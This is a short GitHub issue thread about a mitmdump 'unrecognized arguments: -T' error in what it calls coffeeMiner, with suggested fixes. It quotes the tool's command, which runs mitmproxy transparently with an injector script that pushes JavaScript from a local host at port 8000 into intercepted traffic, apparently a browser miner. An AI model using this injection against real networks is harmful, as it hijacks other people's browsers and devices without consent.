mitmdump: error: unrecognized arguments: -T
IUliiu15 opened this issue · 5 comments
usage: mitmdump [options] [filter]
mitmdump: error: unrecognized arguments: -T
-T is deprecated, please use --mode transparent instead
the eror is from this code :
os.system("/usr/bin/mitmdump -s 'injector.py http://192.168.102:8000/script.js' -T")
But i do not get it, can someone help?
Same issue here
-
modify install.sh
pip3 install --user mitmproxy==2.0.2 -
reexecute
sh install.sh
@sunsipeng I get "Failed building wheel for crryptography" then at the end I get "Command "/usr/bin/python3 -u -c "import setuptools, tokenize;file='/tmp/pip-build-clepowqv/cryptography/setup.py';f=getattr(tokenize, 'open', open)(file);code=f.read().replace('\r\n', '\n');f.close();exec(compile(code, file, 'exec'))" install --record /tmp/pip-dolsd19y-record/install-record.txt --single-version-externally-managed --compile --user --prefix=" failed with error code 1 in /tmp/pip-build-clepowqv/cryptography/"
Same issue here
Change "-T" to "--mode transparent" in coffeeMiner.py